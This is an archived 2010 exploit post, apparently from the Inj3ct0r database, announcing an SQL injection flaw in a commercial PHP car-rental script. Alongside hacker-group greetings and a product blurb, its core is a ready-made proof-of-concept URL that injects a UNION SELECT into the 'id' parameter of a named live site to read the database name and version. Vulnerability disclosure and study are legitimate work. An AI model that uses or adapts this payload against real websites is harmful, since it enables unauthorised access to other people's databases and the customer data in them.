PHP car rental complete System V1.2 SQL Injection Vulnerabil
Posted on 06 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP car rental complete System V1.2 SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================== PHP car rental complete System V1.2 SQL Injection Vulnerability =============================================================== # Title:PHP car rental complete System V1.2 SQli vulnerability # Author: Sid3^effects # Published: 2010-06-06 # price:450 EURo # email:shell_c99@yahoo.com # vendor: NUNO PEREIRA # url : http://www.acarhire.me.uk/ ############################################################################ ooooo .oooooo. oooooo oooooo oooo `888' d8P' `Y8b `888. `888. .8' 888 888 `888. .8888. .8' 888 888 `888 .8'`888. .8' 888 888 `888.8' `888.8' 888 `88b ooo `888' `888' o888o `Y8bood8P' `8' `8' -------------------------------------------------------------------------------------- #####################Sid3^effects aKa HaRi################################## #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks:*L0rd ?rusAd?r*,d4rk-bluâ„¢®,R45C4L,CR4C|< 008,M4n0j,MaYuR #ShouTZ:kedar,dec0d3r,41.w4r10r #spl shoutz:LiquidWorm,gunslinger_ :D #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ Description : PHP Car Rental-Script You can try our latest stable release as it becomes available. To launch the demo open both the web site and control panel views so you can preview your changes as they are made in real time from the control panel. its very simple to use for the client and for the administration to change prices aand add promotions i also has a built in newsletter facility and email collection ############################################################################ Xploit : PHP car rental complete System V1.2 suffers from a sqli vulnerability.. url:http://www.acarhire.me.uk/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12-- ############################################################################ #Sid3^effects # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
